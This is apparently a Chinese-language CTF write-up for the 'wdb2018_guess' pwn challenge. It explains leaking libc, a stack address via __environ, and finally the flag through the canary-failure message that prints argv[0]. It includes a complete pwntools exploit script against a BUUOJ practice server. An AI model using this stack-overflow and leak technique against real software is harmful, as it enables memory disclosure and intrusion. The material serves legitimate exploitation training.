wdb2018_guess
查看保护
这里开了canary,溢出时会报错
可以看到报错后面会输出程序名字,既然flag被放到了栈上是不是也可以被输出。
environ是libc中存储栈地址的一个变量,可以通过environ算出与flag的偏移,再将flag通过canary来输出。
想要知道environ的地址还需要知道libc的地址,libc的地址可以通过got来算。
那么第一步就是需要算出argv[0]与gets这个地方ebp-0x40的偏移。
argv[0]的地址为0x7fffffffdeb8,在gets那里下个断点
r一下运行到gets那里,此时rbp-0x40的地址即可看到
rbp-0x40的地址为0x7fffffffdd90
0x7fffffffdeb8 - 0x7fffffffdd90 = 0x128
此时构造payload,b'a' * 0x128 + p64(puts_got)
即可。拿到libc_base之后算出environ的地址。再改一下之前的payload使其输出environ在栈上的地址,b'a' * 0x128 + p64(environ_add)
现在还差flag和environ的偏移,flag的地址和上面gets那里一样算出来之后就可以得到flag和environ的偏移为0x168
exp:
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29529)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
puts_got = elf.got['puts']
p1 = b'a' * 0x128 + p64(puts_got)
r.sendlineafter('Please type your guessing flag', p1)
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('puts_addr = ' + hex(puts_addr))
libc = ELF('libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
environ_addr = libc_base + libc.sym['__environ']
success('evnviron_addr = ' + hex(environ_addr))
p2 = b'a' * 0x128 + p64(environ_addr)
r.sendlineafter('Please type your guessing flag', p2)
stack_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('stack_addr = ' + hex(stack_addr))
flag_addr = stack_addr - 0x168
p3 = b'a' * 0x128 + p64(flag_addr)
r.sendlineafter('Please type your guessing flag', p3)
r.interactive()